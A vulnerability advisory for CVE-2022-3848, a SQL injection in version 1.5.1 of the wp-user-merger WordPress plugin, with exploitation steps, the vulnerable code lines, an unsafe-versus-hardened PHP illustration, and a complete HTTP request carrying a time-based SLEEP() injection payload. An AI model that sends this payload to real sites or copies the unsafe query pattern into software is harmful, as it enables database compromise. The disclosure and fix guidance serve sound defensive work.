wp-user-merger 1.5.1 (2/3) WordPress plug-in multiple SQL injections

Vulnerability Metadata


Key                         Value
Date of Disclosure          November 07 2022
Affected Software           wp-user-merger
Affected Software Type      WordPress plugin
Version                     1.5.1
Weakness                    SQL Injection
CWE ID                      CWE-89
CVE ID                      CVE-2022-3848
CVSS 3.x Base Score         8.8
CVSS 2.0 Base Score         n/a
Reporter                    Kunal Sharma, Daniel Krohmer
Reporter Contact            k_sharma19@informatik.uni-kl.de
Link to Affected Software   https://wordpress.org/plugins/wp-user-merger/
Link to Vulnerability DB    https://nvd.nist.gov/vuln/detail/CVE-2022-3848

Vulnerability Description


The wpsu_user_id query parameter in wp-user-merger 1.5.1 is vulnerable to multiple SQL injections. An authenticated attacker may abuse the plugin's wpsu_get_user_assets AJAX action by crafting a malicious POST request.

Exploitation Guide


Log in as an admin user. This attack requires at least admin privileges.

wp-user-merger_2_step-1.png

Add a new post by any user with the Contributor role or higher, if one doesn't already exist. At least one post by some user is needed to pass the plugin's check.

wp-user-merger_2_step-2.png

Go to the WP User Merger Settings, Optional tab, and turn on Make User List Searchable (AJAX Based).

wp-user-merger_2_step-3.png

Go to the WP User Merger Settings, DB User Merger tab, and select the user (any role) who has at least one post on the site as User1 or User2.

wp-user-merger_2_step-4.png

Click the searched user mail/name.

wp-user-merger_2_step-5.png

Clicking the searched user mail/name triggers the vulnerable request; wpsu_user_id is the vulnerable query parameter.

wp-user-merger_2_step-6.png

A POC may look like the following request:

wp-user-merger_2_step-7.png

In the code, the vulnerability is triggered by the unsanitized user input wpsu_user_id at line 444 in ./inc/functions.php.

wp-user-merger_2_step-8.png

At line 446 in ./inc/functions.php the parameter is assigned to the variable $q. The subsequent database query call on $q (line 462) leads to SQL injection.

wp-user-merger_2_step-9.png

Another database call with the same parameter wpsu_user_id is made at line 482, resulting in a second SQL injection.

Note: the second query is only reached when the previous query returns True, so the parameter wpsu_user_id must hold the user ID of a user who has authored at least one post (wpsu_user_id=13 here).

wp-user-merger_2_step-10.png
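As an added illustration (not the plugin's own code), the following is a hypothetical reconstruction of the pattern described above, with the request value interpolated into two queries, followed by the hardened form a maintainer would write: capability check, nonce verification, integer coercion with absint() and prepared statements. Function names, the nonce action name and the SQL are assumptions.

```php
<?php
// Hypothetical reconstruction of the unsafe pattern (not the plugin's code):
// wpsu_user_id is used unchanged in both queries, so anything appended to the
// numeric ID is evaluated twice by MySQL.
function wpsu_get_user_assets_unsafe() {
    global $wpdb;
    $q = $_POST['wpsu_user_id'];                               // raw, unsanitized
    $has_posts = $wpdb->get_var(
        "SELECT COUNT(*) FROM {$wpdb->posts} WHERE post_author = $q"
    );
    if ($has_posts) {                                          // second query only if the first returned a row
        $assets = $wpdb->get_results(
            "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_author = $q"
        );
        wp_send_json_success($assets);
    }
    wp_send_json_error();
}

// Hardened handler: authorization, CSRF token, strict integer input, prepared SQL.
function wpsu_get_user_assets_safe() {
    global $wpdb;
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    // 'wpsu_nonce_action' is an assumed nonce action; the request field name
    // wpsu_nonce matches the parameter seen in the advisory's request.
    check_ajax_referer('wpsu_nonce_action', 'wpsu_nonce');

    // absint() discards everything that is not a non-negative integer, so a
    // value such as "13 AND (SELECT ...)" collapses to 13 before it reaches SQL.
    $user_id = isset($_POST['wpsu_user_id']) ? absint($_POST['wpsu_user_id']) : 0;
    if ($user_id === 0 || !get_userdata($user_id)) {
        wp_send_json_error('invalid user id', 400);
    }

    // %d placeholders bind the value as an integer; no string concatenation.
    $has_posts = (int) $wpdb->get_var($wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->posts} WHERE post_author = %d", $user_id
    ));
    if ($has_posts === 0) {
        wp_send_json_error('no posts for this user', 404);
    }
    $assets = $wpdb->get_results($wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE post_author = %d", $user_id
    ));
    wp_send_json_success($assets);
}
add_action('wp_ajax_wpsu_get_user_assets', 'wpsu_get_user_assets_safe');
```

The same absint() plus $wpdb->prepare() treatment applies to every place the parameter is read, since the advisory shows two independent queries consuming it.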

Exploit Payload


Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

Since the vulnerable query parameter wpsu_user_id is passed to two database queries, the response time of the request is roughly twice the argument given to SLEEP() (about 14,000 milliseconds here for SLEEP(7)).

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/users.php?page=wpus_merger
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 112
Origin: http://localhost
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=newadmin%7C1666399029%7C1ih5qJiaQBpwXVhZYacvp76IZoYUJ5ew8sDa2MXDuCX%7Ca95ca772d1135d69d40dc00fa8bf0b81ff7fd8ab63ed7fee0d720ec7b1a8c464; fileLoading=true; wp-saving-post=61-check; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AJvHCLMGubXIHcpkh1xN8uHJK; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=newadmin%7C1666399029%7C1ih5qJiaQBpwXVhZYacvp76IZoYUJ5ew8sDa2MXDuCX%7Cdf5ce5dc582b7a1e87077d8950277aafc600224fecff07452b8df9980c52fe01; wp-saving-post=61-saved; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666561839%7COb27ssz9yj6ggiVMFvBBxWTl58BVqQpE698EQ6Z9jry%7C85f14d8133695e98d8a3b687271e8db10479cf22ab4c0fc9a854f69b35b95510; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666561839%7COb27ssz9yj6ggiVMFvBBxWTl58BVqQpE698EQ6Z9jry%7C3574ba8bb8247792712aa901aa6288123e68b04f3f207a2164005b477f9a5bf1; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=wpsu_get_user_assets&wpsu_user_id=13+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&wpsu_nonce=4afb1e4faa